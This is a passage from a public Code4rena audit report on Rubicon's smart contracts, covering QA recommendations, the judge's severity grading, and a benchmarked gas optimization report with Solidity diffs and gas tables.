We have noticed that the contract RubiconMarket.sol implements many type conversions from uint256 to uint128. We recommend using the OpenZeppelin SafeCast library to make the project more robust and take advantage of the gas optimizations and best practices provided by OpenZeppelin.

     * @dev Returns the downcasted uint128 from uint256, reverting on
     * overflow (when the input is greater than largest uint128).
     * Counterpart to Solidity's `uint128` operator.
     * Requirements:
     * - input must fit into 128 bits
     * _Available since v2.5._
    function toUint128(uint256 value) internal pure returns (uint128) {
        require(value <= type(uint128).max, "SafeCast: value doesn't fit in 128 bits");
        return uint128(value);


In the FeeWrapper.sol contract, the low-level call() function is used for certain operations. However, it is recommended to use the Address.sol library from OpenZeppelin to implement these operations in a secure manner and take advantage of the gas optimizations and good practices offered by that library.

     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *[Learn more].
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     *[checks-effects-interactions pattern].
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) ={value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");


We suggest implementing best practices for SYMBOL, DECIMALS & NAME on lines L146-147 and L148 in the BathHouseV2 contract . Therefore, we recommend using the following functions from this library: Library BoringERC20.


We recommend using a more recent version of Solidity, such as 0.8.18, to take advantage of the latest improvements and features, including better code readability in the case of mappings.

You have 19 mappings in the scope.

For example:

mapping(address account => uint256 balance)

HickupHH3 (judge) commented:

It would have been great if the report was filtered against the automated output.

L-01: Refactor
L-02: Refactor
L-03: Refactor
L-04: Non-Critical
L-05: Non-Critical
L-06: Low
L-07: Refactor
L-08: Refactor
L-09: Low
L-10: Refactor
L-11: Refactor
L-12: Refactor

N-01 / N-12: Non-Critical
N-02 / S-04: Non-Critical
N-03: Non-Critical
N-04: Non-Critical
N-05: Non-Critical
N-06: Non-Critical
N-07: Non-Critical
N-08: Non-Critical
N-09: Non-Critical
N-10 / N-11: Non-Critical
N-13: Non-Critical
N-14: Non-Critical
N-15: Non-Critical
N-16: Non-Critical
N-17: Refactor
N-18: Non-Critical
N-19: Non-Critical
N-20: Non-Critical

R-01: Refactor
R-02: Non-Critical
S-01: Refactor
S-02: Refactor
S-03: Refactor

For a total of 2 Lows, 13 Refactors + 23 Non-Criticals.

Gas Optimizations

For this audit, 29 reports were submitted by wardens detailing gas optimizations. The report highlighted below by JCN received the top score from the judge.

The following wardens also submitted reports: Udsen, adriro, c3phas, MohammedRizwan, hunter_w3b, ddimitrov22, pixpi, SAAJ, saneryee, 0xSmartContract, __141345__, atharvasama, SleepingShell, thekmj, Madalad, Rageur, BGSecurity, 0xnev, matrix_0wl, Raihan, ReyAdmirado, 0x6980, dharma09, RaymondFam, 0x3b, Sathish9098, Rolezn and 0xhacksmithh.


A majority of the optimizations were benchmarked via the protocol’s tests, i.e. using the following config: solc version 0.8.17, optimizer on, and 5 runs. Optimizations that were not benchmarked are explained via EVM gas costs and opcodes.

Below are the overall average gas savings for the following tested functions, with all the optimizations applied (not including G-01 and G-02): | Function | Before | After | Avg Gas Savings | | ------ | -------- | -------- | ------- | | BathBuddy.notifyRewardAmount | 113455 | 68064 | 45391 | | BathBuddy.setRewardsDuration | 49947 | 47792 | 2155 |
| BathHouseV2.claimRewards | 265601 | 240252 | 25349 | | ExpiringMarket.cancel | 118396 | 86489 | 31907 | | Position.buyAllAmountWithLeverage | 694718 | 638441 | 56277 | | Position.closePosition | 500436 | 490680 | 9756 | | Position.increaseMargin | 201193 | 195290 | 5903 | | | 142006 | 139691 | 2315 | | RubiconMarket.offer | 259582 | 251681 | 7901 | | RubiconMarket.sellAllAmount | 145248 | 142506 | 2742 | | RubiconRouter.buyAllAmountForETH | 217184 | 201348 | 15836 | | RubiconRouter.buyAllAmountWithETH | 225975 | 220047 | 5928 | | RubiconRouter.cancelForETH | 169250 | 152143 | 17107 | | RubiconRouter.offerForETH | 332029 | 331577 | 452 | | RubiconRouter.offerWithETH | 350416 | 350246 | 170 |

Total gas saved across all listed functions: 229189


  • The Avg gas changes unpredictably for buyAllAmountWithLeverage and therefore the Min gas for this function is used for benchmarking.
  • The Gas report output, after all optimizations have been applied, can be found at the end of the report.
  • The final diffs for each contract, with all the optimizations applied, can be found here.
  • Some code snippets may be truncated to save space. Code snippets may also be accompanied by @audit tags in comments to aid in explaining the issue.

Gas Optimizations

Number Issue Instances
[G‑01] Do not use SafeMath -
[G‑02] Use a more gas efficient synchronized modifier -
[G‑03] Multiple address mappings can be combined into a single mapping of an address to a struct, where appropriate 2
[G‑04] State variables only set in the constructor should be declared immutable 4
[G‑05] State variables can be cached instead of re-reading them from storage 32
[G‑06] Avoid emitting storage values 1
[G‑07] Structs can be packed to use fewer storage slots 2
[G‑08] State variables can be packed to use fewer storage slots 1
[G‑09] Rearrange storage variables to pack values more efficiently 1
[G‑10] Return values from external calls can be cached to avoid unecessary call 1
[G‑11] Multiple accesses of a mapping/array should use a storage pointer 43
[G‑12] Use assembly for value transfer and success check 1

[G-01] Do not use SafeMath

Since version 0.8.0, the compiler will throw an error for under/overflows. It does so by including extra opcodes to perform the necessary checks. Therefore, using SafeMath and the in-house DSMath contract is unnecessary and is wasting gas by doing extra computation (under/overflow checks). Save gas by not using SafeMath and the DSMath contract.

The following files have this issue: RubiconMarket.sol, which uses the DSMath contract, BathBuddy.sol, and Position.sol.

[G-02] Use a more gas efficient synchronized modifier

Each time a function that uses the synchronized modifier is called, said function will undergo a gas cost of 22.9k for setting the locked slot to 1 from 0 (20k gas) and then back to 0 from 1 (2.9k gas). We are able to use a 1 and 2 instead of false and true to make a more efficient modifier. Using 1 and 2, the functions will undergo a gas cost of 5.8k: 1 -> 2 (2.9k gas) & 2 -> 1 (2.9k gas). See this article for more information.

Functions which have the synchronized modifier:, SimpleMarket.cancel, and SimpleMarket.offer.

Estimated Gas Saved: 17100.

264:    modifier synchronized() {
265:        require(!locked);
266:        locked = true;
267:        _;
268:        locked = false;
269:    }

[G-03] Multiple address mappings can be combined into a single mapping of an address to a struct, where appropriate

We can combine multiple mappings below into structs. We can then pack the structs by modifying the uint type for the values. This will result in cheaper storage reads since multiple mappings are accessed in functions and those values are now occupying the same storage slot, meaning the slot will become warm after the first SLOAD. In addition, when setting the struct values we will avoid incurring multiple Gsset (20000 gas) since multiple struct values are now occupying the same slot.

The first 5 mappings relate to token information and can therefore be combined into a struct. The last two mappings contain token information that is specific to a user, therefore those mappings can be combined into another struct.

Gas Savings for notifyRewardAmount, obtained via protocol’s tests: Avg 43096 gas. | | Min | Max | Avg | # calls | | ------ | -------- | -------- | ------- | -------- | | Before | - | - | 113455 | 1 | | After | - | - | 70359 | 1 |

Gas Savings for setRewardsDuration, obtained via protocol’s tests: Avg 2120 gas. | | Min | Max | Avg | # calls | | ------ | -------- | -------- | ------- | -------- | | Before | - | - | 49947 | 1 | | After | - | - | 47827 | 1 |

Gas Savings for claimRewards, obtained via protocol’s tests: Avg 23219 gas. | | Min | Max | Avg | # calls | | ------ | -------- | -------- | ------- | -------- | | Before | - | - | 265601 | 1 | | After | - | - | 242382 | 1 |

File: contracts/periphery/BathBuddy.sol
52:    mapping(address => uint256) public periodFinish; // Token specific
53:    mapping(address => uint256) public rewardRates; // Token specific reward rates
54:    mapping(address => uint256) public rewardsDuration; // Can be kept global but can also be token specific
55:    mapping(address => uint256) public lastUpdateTime; //Token specific
56:    mapping(address => uint256) public rewardsPerTokensStored; // Token specific
58:    // Token then user always
59:    mapping(address => mapping(address => uint256))
60:        public userRewardsPerTokenPaid; // ATTEMPTED TOKEN AGNOSTIC
61:    mapping(address => mapping(address => uint256)) public tokenRewards; // ATTEMPTED TOKEN AGNOSTIC
diff --git a/contracts/periphery/BathBuddy.sol b/contracts/periphery/BathBuddy.sol
index 4aac344..6d49bde 100644
--- a/contracts/periphery/BathBuddy.sol
+++ b/contracts/periphery/BathBuddy.sol
@@ -48,17 +48,24 @@ contract BathBuddy is ReentrancyGuard, IBathBuddy, Pausable {
     address public bathHouse;
     bool public friendshipStarted;

+    struct TokenInfo {
+        uint80 periodFinish;
+        uint80 lastUpdateTime;
+        uint80 rewardsDuration;
+        uint128 rewardRates;
+        uint128 rewardsPerTokensStored;
+    }
+    struct UserInfo {
+        uint128 userRewardsPerTokenPaid;
+        uint128 tokenRewards;
+    }
     /// @dev set to block.timestamp + rewards duration to track an active rewards period after notifyRewardAmount()
-    mapping(address => uint256) public periodFinish; // Token specific
-    mapping(address => uint256) public rewardRates; // Token specific reward rates
-    mapping(address => uint256) public rewardsDuration; // Can be kept global but can also be token specific
-    mapping(address => uint256) public lastUpdateTime; //Token specific
-    mapping(address => uint256) public rewardsPerTokensStored; // Token specific
+    mapping(address => TokenInfo) public tokenInfo;

     // Token then user always
-    mapping(address => mapping(address => uint256))
-        public userRewardsPerTokenPaid; // ATTEMPTED TOKEN AGNOSTIC
-    mapping(address => mapping(address => uint256)) public tokenRewards; // ATTEMPTED TOKEN AGNOSTIC
+    mapping(address => mapping(address => UserInfo)) public userInfo;

     /* ========== CONSTRUCTOR ========== */

@@ -112,23 +119,25 @@ contract BathBuddy is ReentrancyGuard, IBathBuddy, Pausable {
     function lastTimeRewardApplicable(
         address token
     ) public view returns (uint256) {
+        TokenInfo storage _tokenInfo = tokenInfo[token];
-            block.timestamp < periodFinish[token]
+            block.timestamp < _tokenInfo.periodFinish
                 ? block.timestamp
-                : periodFinish[token];
+                : _tokenInfo.periodFinish;

     function rewardPerToken(address token) public view returns (uint256) {
         require(friendshipStarted, "I have not started a bathToken friendship");
+        TokenInfo storage _tokenInfo = tokenInfo[token];
         if (IERC20(myBathTokenBuddy).totalSupply() == 0) {
-            return rewardsPerTokensStored[token];
+            return _tokenInfo.rewardsPerTokensStored;
-            rewardsPerTokensStored[token].add(
+            uint256(_tokenInfo.rewardsPerTokensStored).add(
-                    .sub(lastUpdateTime[token])
-                    .mul(rewardRates[token])
+                    .sub(_tokenInfo.lastUpdateTime)
+                    .mul(_tokenInfo.rewardRates)
@@ -141,23 +150,25 @@ contract BathBuddy is ReentrancyGuard, IBathBuddy, Pausable {
         address token
     ) public view override returns (uint256) {
         require(friendshipStarted, "I have not started a bathToken friendship");
+        UserInfo storage _userInfo = userInfo[token][account];
             IERC20(myBathTokenBuddy) // Care with this?
-                        userRewardsPerTokenPaid[token][account]
+                        _userInfo.userRewardsPerTokenPaid
-                .add(tokenRewards[token][account]);
+                .add(_userInfo.tokenRewards);

     function getRewardForDuration(
         address token
     ) external view returns (uint256) {
-        return rewardRates[token].mul(rewardsDuration[token]);
+        TokenInfo storage _tokenInfo = tokenInfo[token];
+        return uint256(_tokenInfo.rewardRates).mul(_tokenInfo.rewardsDuration);

     /* ========== MUTATIVE FUNCTIONS ========== */
@@ -176,9 +187,10 @@ contract BathBuddy is ReentrancyGuard, IBathBuddy, Pausable {
         updateReward(holderRecipient, address(rewardsToken))
-        uint256 reward = tokenRewards[address(rewardsToken)][holderRecipient];
+        UserInfo storage _userInfo = userInfo[address(rewardsToken)][holderRecipient];
+        uint256 reward = _userInfo.tokenRewards;
         if (reward > 0) {
-            tokenRewards[address(rewardsToken)][holderRecipient] = 0;
+            _userInfo.tokenRewards = 0;
             rewardsToken.safeTransfer(holderRecipient, reward);
             emit RewardPaid(holderRecipient, reward);
@@ -192,20 +204,21 @@ contract BathBuddy is ReentrancyGuard, IBathBuddy, Pausable {
         uint256 reward,
         IERC20 rewardsToken
     ) external onlyOwner updateReward(address(0), address(rewardsToken)) {
-        if (block.timestamp >= periodFinish[address(rewardsToken)]) {
-            rewardRates[address(rewardsToken)] = reward.div(
-                rewardsDuration[address(rewardsToken)]
-            );
+        TokenInfo storage _tokenInfo = tokenInfo[address(rewardsToken)];
+        if (block.timestamp >= _tokenInfo.periodFinish) {
+            _tokenInfo.rewardRates = uint128(reward.div(
+                _tokenInfo.rewardsDuration
+            ));
         } else {
-            uint256 remaining = periodFinish[address(rewardsToken)].sub(
+            uint256 remaining = uint256(_tokenInfo.periodFinish).sub(
             uint256 leftover = remaining.mul(
-                rewardRates[address(rewardsToken)]
-            );
-            rewardRates[address(rewardsToken)] = reward.add(leftover).div(
-                rewardsDuration[address(rewardsToken)]
+                _tokenInfo.rewardRates
+            _tokenInfo.rewardRates = uint128(reward.add(leftover).div(
+                _tokenInfo.rewardsDuration
+            ));

         // Ensure the provided reward amount is not more than the balance in the contract.
@@ -215,15 +228,15 @@ contract BathBuddy is ReentrancyGuard, IBathBuddy, Pausable {
         // Note********** ERC20s must be here*************
         uint256 balance = rewardsToken.balanceOf(address(this));
-            rewardRates[address(rewardsToken)] <=
-                balance.div(rewardsDuration[address(rewardsToken)]),
+            _tokenInfo.rewardRates <=
+                balance.div(_tokenInfo.rewardsDuration),
             "Provided reward too high"

-        lastUpdateTime[address(rewardsToken)] = block.timestamp;
-        periodFinish[address(rewardsToken)] = block.timestamp.add(
-            rewardsDuration[address(rewardsToken)]
-        );
+        _tokenInfo.lastUpdateTime = uint80(block.timestamp);
+        _tokenInfo.periodFinish = uint80(block.timestamp.add(
+            _tokenInfo.rewardsDuration
+        ));
         emit RewardAdded(reward);

@@ -233,25 +246,26 @@ contract BathBuddy is ReentrancyGuard, IBathBuddy, Pausable {
         uint256 _rewardsDuration,
         address token
     ) external onlyOwner {
+        TokenInfo storage _tokenInfo = tokenInfo[token];
-            block.timestamp > periodFinish[token],
+            block.timestamp > _tokenInfo.periodFinish,
             "Previous rewards period must be complete before changing the duration for the new period"
-        rewardsDuration[token] = _rewardsDuration;
-        emit RewardsDurationUpdated(rewardsDuration[token]);
+        _tokenInfo.rewardsDuration = uint80(_rewardsDuration);
+        emit RewardsDurationUpdated(_tokenInfo.rewardsDuration);

     /* ========== MODIFIERS ========== */

     // Rewards set here
     modifier updateReward(address account, address token) {
-        rewardsPerTokensStored[token] = rewardPerToken(token);
-        lastUpdateTime[token] = lastTimeRewardApplicable(token);
+        TokenInfo storage _tokenInfo = tokenInfo[token];
+        _tokenInfo.rewardsPerTokensStored = uint128(rewardPerToken(token));
+        _tokenInfo.lastUpdateTime = uint80(lastTimeRewardApplicable(token));
         if (account != address(0)) {
-            tokenRewards[token][account] = earned(account, token);
-            userRewardsPerTokenPaid[token][account] = rewardsPerTokensStored[
-                token
-            ];
+            UserInfo storage _userInfo = userInfo[token][account];
+            _userInfo.tokenRewards = uint128(earned(account, token));
+            _userInfo.userRewardsPerTokenPaid = _tokenInfo.rewardsPerTokensStored;

[G-04] State variables only set in the constructor should be declared immutable

The solidity compiler will directly embed the values of immutable variables into your contract bytecode and therefore will save you from incurring a Gsset (20000 gas) when you set storage variables in the constructor, a Gcoldsload (2100 gas) when you access storage variables for the first time in a transaction, and a Gwarmaccess (100 gas) for each subsequent access to that storage slot.

Total Instances: 4

Estimated Gas Saved: 4 * 2100 = 8400

File: contracts/utilities/poolsUtility/Position.sol
44:    Comptroller public comptroller;
45:    PriceOracle public oracle;
46:    RubiconMarket public rubiconMarket;
47:    BathHouseV2 public bathHouseV2;
diff --git a/contracts/utilities/poolsUtility/Position.sol b/contracts/utilities/poolsUtility/Position.sol
index 7c72d4f..a79c2fe 100644
--- a/contracts/utilities/poolsUtility/Position.sol
+++ b/contracts/utilities/poolsUtility/Position.sol
@@ -41,10 +41,10 @@ contract Position is Ownable, DSMath {
     // position id => Position struct
     mapping(uint256 => Position) public positions;

-    Comptroller public comptroller;
-    PriceOracle public oracle;
-    RubiconMarket public rubiconMarket;
-    BathHouseV2 public bathHouseV2;
+    Comptroller immutable public comptroller;
+    PriceOracle immutable public oracle;
+    RubiconMarket immutable public rubiconMarket;
+    BathHouseV2 immutable public bathHouseV2;

     // events
     event PositionOpened(uint256 positionId, Position position);

[G-05] State variables can be cached instead of re-reading them from storage

Caching of a state variable replaces each Gwarmaccess (100 gas) with a much cheaper stack read.

There are 32 instances of this issue. (For in-depth details on this and all further gas optimizations with multiple instances, please see the warden’s full report.)

Estimated Gas Saved: 32 * 100 = 3200.

[G-06] Avoid emitting storage values

Caching of a state variable replaces each Gwarmaccess (100 gas) with a much cheaper stack read. We can avoid unecessary SLOADs by caching storage values that were previously accessed and emitting those cached values.

Emit _rewardsDuration instead of reading from storage.

File: contracts/periphery/BathBuddy.sol
232:    function setRewardsDuration(
233:        uint256 _rewardsDuration,
234:        address token
235:    ) external onlyOwner {
236:        require(
237:            block.timestamp > periodFinish[token],
238:            "Previous rewards period must be complete before changing the duration for the new period"
239:        );
240:        rewardsDuration[token] = _rewardsDuration;
241:        emit RewardsDurationUpdated(rewardsDuration[token]); // @audit: unecessary SLOAD, emit _rewardsDuration
242:    }
diff --git a/contracts/periphery/BathBuddy.sol b/contracts/periphery/BathBuddy.sol
index 4aac344..171d14b 100644
--- a/contracts/periphery/BathBuddy.sol
+++ b/contracts/periphery/BathBuddy.sol
@@ -238,7 +238,7 @@ contract BathBuddy is ReentrancyGuard, IBathBuddy, Pausable {
             "Previous rewards period must be complete before changing the duration for the new period"
         rewardsDuration[token] = _rewardsDuration;
-        emit RewardsDurationUpdated(rewardsDuration[token]);
+        emit RewardsDurationUpdated(_rewardsDuration);

[G-07] Structs can be packed to use fewer storage slots

The EVM works with 32 byte words. Variables less than 32 bytes can be declared next to each other in storage and this will pack the values together into a single 32 byte storage slot (if values combined are <= 32 bytes). If the variables packed together are retrieved together in functions (more likely with structs) we will effectively save ~2000 gas with every subsequent SLOAD for that storage slot. This is due to us incurring a Gwarmaccess (100 gas) versus a Gcoldsload (2100 gas).

There are 2 instances of this issue.

[G-08] State variables can be packed to use fewer storage slots

The EVM works with 32 byte words. Variables less than 32 bytes can be declared next to each other in storage and this will pack the values together into a single 32 byte storage slot (if the values combined are <= 32 bytes). If the variables packed together are retrieved together in functions we will effectively save ~2000 gas with every subsequent SLOAD for that storage slot. This is due to us incurring a Gwarmaccess (100 gas) versus a Gcoldsload (2100 gas).

Pack feeBPS and feeTo into one storage slot to save 1 SLOT (~2000 gas)

feeBPS is able to be of type uint96 without fear of overflowing.

Both state variables are accessed in

File: contracts/RubiconMarket.sol
227:    uint256 internal feeBPS;
229:    /// @dev This parameter provides the address to which fees are sent
230:    address internal feeTo;
diff --git a/contracts/RubiconMarket.sol b/contracts/RubiconMarket.sol
index 219e915..9f284d1 100644
--- a/contracts/RubiconMarket.sol
+++ b/contracts/RubiconMarket.sol
@@ -223,12 +223,12 @@ contract SimpleMarket is EventfulMarket, DSMath {

     bool locked;

-    /// @dev This parameter is in basis points
-    uint256 internal feeBPS;
     /// @dev This parameter provides the address to which fees are sent
     address internal feeTo;

+    /// @dev This parameter is in basis points
+    uint96 internal feeBPS;
     bytes32 internal constant MAKER_FEE_SLOT = keccak256("WOB_MAKER_FEE");

     struct OfferInfo {
@@ -1464,7 +1464,7 @@ contract RubiconMarket is MatchingEvents, ExpiringMarket, DSNote {

     function setFeeBPS(uint256 _newFeeBPS) external auth returns (bool) {
-        feeBPS = _newFeeBPS;
+        feeBPS = uint96(_newFeeBPS);
         return true;

[G-09] Rearrange storage variables to pack values more efficiently

friendshipStarted and myBathTokenBuddy would benefit more from being stored in the same storage slot because they are both retrieved in rewardPerToken and earned. frienshipStarted and bathHouse are both retrieved only in the getReward function.

Gas Savings for notifyRewardAmount, obtained via protocol’s tests: Avg 2000 gas.

Min Max Avg # calls
Before - - 113455 1
After - - 111455 1
File: contracts/periphery/BathBuddy.sol
46:    address public owner;
47:    address public myBathTokenBuddy;
48:    address public bathHouse;
49:    bool public friendshipStarted;
diff --git a/contracts/periphery/BathBuddy.sol b/contracts/periphery/BathBuddy.sol
index 4aac344..a05bb11 100644
--- a/contracts/periphery/BathBuddy.sol
+++ b/contracts/periphery/BathBuddy.sol
@@ -44,8 +44,8 @@ contract BathBuddy is ReentrancyGuard, IBathBuddy, Pausable {
     address public owner;
-    address public myBathTokenBuddy;
     address public bathHouse;
+    address public myBathTokenBuddy;
     bool public friendshipStarted;

[G-10] Return values from external calls can be cached to avoid unnecessary call

External calls are expensive as they use the CALL/STATICCALL opcode (~100 gas). If you are calling the same external function more than once you should cache the return value to avoid an unnecessary CALL/STATICCALL.

Cache IERC20(myBathTokenBuddy).totalSupply()

Gas Savings for BathBuddy.claimRewards, obtained via protocol’s tests: Avg 1798 gas.

Min Max Avg # calls
Before - - 265601 1
After - - 263803 1
File: contracts/periphery/BathBuddy.sol
121:    function rewardPerToken(address token) public view returns (uint256) {
122:        require(friendshipStarted, "I have not started a bathToken friendship");
124:        if (IERC20(myBathTokenBuddy).totalSupply() == 0) { // @audit: 1st external call
125:            return rewardsPerTokensStored[token];
126:        }
127:        return
128:            rewardsPerTokensStored[token].add(
129:                lastTimeRewardApplicable(token)
130:                    .sub(lastUpdateTime[token])
131:                    .mul(rewardRates[token])
132:                    .mul(1e18)
133:                    .div(IERC20(myBathTokenBuddy).totalSupply()) // @audit: 2nd external call
134:            );
135:    }
diff --git a/contracts/periphery/BathBuddy.sol b/contracts/periphery/BathBuddy.sol
index 4aac344..b5a9de7 100644
--- a/contracts/periphery/BathBuddy.sol
+++ b/contracts/periphery/BathBuddy.sol
@@ -120,8 +120,9 @@ contract BathBuddy is ReentrancyGuard, IBathBuddy, Pausable {

     function rewardPerToken(address token) public view returns (uint256) {
         require(friendshipStarted, "I have not started a bathToken friendship");
-        if (IERC20(myBathTokenBuddy).totalSupply() == 0) {
+        uint256 _totalSupply = IERC20(myBathTokenBuddy).totalSupply();
+        if (_totalSupply == 0) {
             return rewardsPerTokensStored[token];
@@ -130,7 +131,7 @@ contract BathBuddy is ReentrancyGuard, IBathBuddy, Pausable {
-                    .div(IERC20(myBathTokenBuddy).totalSupply())
+                    .div(_totalSupply)

[G-11] Multiple accesses of a mapping/array should use a storage pointer

Caching a mapping’s value in a storage pointer when the value is accessed multiple times saves ~40 gas per access due to not having to perform the same offset calculation every time. Help the Optimizer by saving a storage variable’s reference instead of repeatedly fetching it.

To achieve this, declare a storage pointer for the variable and use it instead of repeatedly fetching the reference in a map or an array. As an example, instead of repeatedly calling offers[id], save its reference via a storage pointer: OfferInfo storage _offer = offers[id] and use the pointer instead.

There are 43 instances of this issue.

[G-12] Use assembly for value transfer and success check

If we are not using the return data from a low level .call, we can avoid creating extra stack variables and storing return data into memory by using assembly to access the CALL opcode and specify 0 for both the return data offset and the return data size.

File: contracts/utilities/FeeWrapper.sol
118:        (bool OK, ) = payable(_feeTo).call{value: _feeAmount}("");
119:		require(OK, "ETH transfer failed");
diff --git a/contracts/utilities/FeeWrapper.sol b/contracts/utilities/FeeWrapper.sol
index 88d6cfe..173e2ee 100644
--- a/contracts/utilities/FeeWrapper.sol
+++ b/contracts/utilities/FeeWrapper.sol
@@ -115,8 +115,13 @@ contract FeeWrapper {
         require(msg.value == _totalAmount, "FeeWrapper: not enough ETH sent");

         // transfer fee to the 3rd party protocol
-        (bool OK, ) = payable(_feeTo).call{value: _feeAmount}("");
-               require(OK, "ETH transfer failed");
+        assembly {
+            let OK := call(gas(), _feeTo, _feeAmount, 0, 0, 0, 0)
+            if iszero(OK) {
+                revert(0, 0)
+            }
+        }
         _msgValue = msg.value - _feeAmount;

GasReport output, with all optimizations applied

Note: see GasReport for more details.

daoio (Rubicon) acknowledged

HickupHH3 (judge) commented:

Best report for having benchmarked with the setup.

For G-02, a lot of wardens pointed out replacing the boolean locked to a uint one. As it’s an upgrade from V1 to V2, it can only be changed to uint8 to preserve the storage layout. Furthermore, I tested it out and found that oddly, gas costs increased.


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C4 Audits incentivize the discovery of exploits, vulnerabilities, and bugs in smart contracts. Security researchers are rewarded at an increasing rate for finding higher-risk issues. Audit submissions are judged by a knowledgeable security researcher and solidity developer and disclosed to sponsoring developers. C4 does not conduct formal verification regarding the provided code but instead provides final verification.

C4 does not provide any guarantee or warranty regarding the security of this project. All smart contract software should be used at the sole risk and responsibility of users.